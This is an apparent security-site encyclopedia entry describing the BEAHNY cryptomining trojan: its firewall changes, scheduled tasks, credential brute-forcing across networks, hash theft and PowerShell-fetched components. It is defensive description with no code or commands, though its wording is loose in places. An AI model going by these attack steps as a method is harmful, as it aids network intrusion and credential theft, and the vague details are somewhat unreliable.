TrojanSpy.Win32.BEAHNY.THCACAI

By GoldSparrow in Trojans

Translate To:

TrojanSpy.Win32.BEAHNY.THCACAI, as its name indicates, is a modular threat with worm features that is used by cybercriminals to mine the Monero cryptocurrency. TrojanSpy.Win32.BEAHNY.THCACAI has a very stealthy way to infect a computer: Using remote command it alters port and firewall by forwarding the settings of the machines it infects and issues a scheduled task, download and install a copy of its program, which TrojanSpy.Win32.BEAHNY.THCACAI has sent previously.

After invading a computer, TrojanSpy.Win32.BEAHNY.THCACAI will use a list of known bad credentials to gain access to other machines belonging to the network. Then TrojanSpy.Win32.BEAHNY.THCACAI
collects the list of the weak passwords' hashes, as well as the hashes saved on the computer. When these tasks are done, TrojanSpy.Win32.BEAHNY.THCACAI collects details about the security products used on the machine and the Mac address. The TrojanSpy.Win32.BEAHNY.THCACAIcomponents will be downloaded and executed by a PowerShell, which the threat has downloaded previously. TrojanSpy.Win32.BEAHNY.THCACAI collects information about the infected computer that may lead to the identification of its owner, the activities performed and other crucial details. TrojanSpy.Win32.BEAHNY.THCACAI should be removed upon detection.

Enigma Software Group Prevails Over Malwarebytes at the Ninth Circuit

Search

Change Region

TrojanSpy.Win32.BEAHNY.THCACAI

Submit Comment

Trending

'YouPorn' Email Scam

Safe Search Eng

Findtheirreport.com

Most Viewed

Is Lookmovie.io Safe?

How To Fix 'Printer Driver is Unavailable' Error

Discord Shows Black Screen when Sharing Screen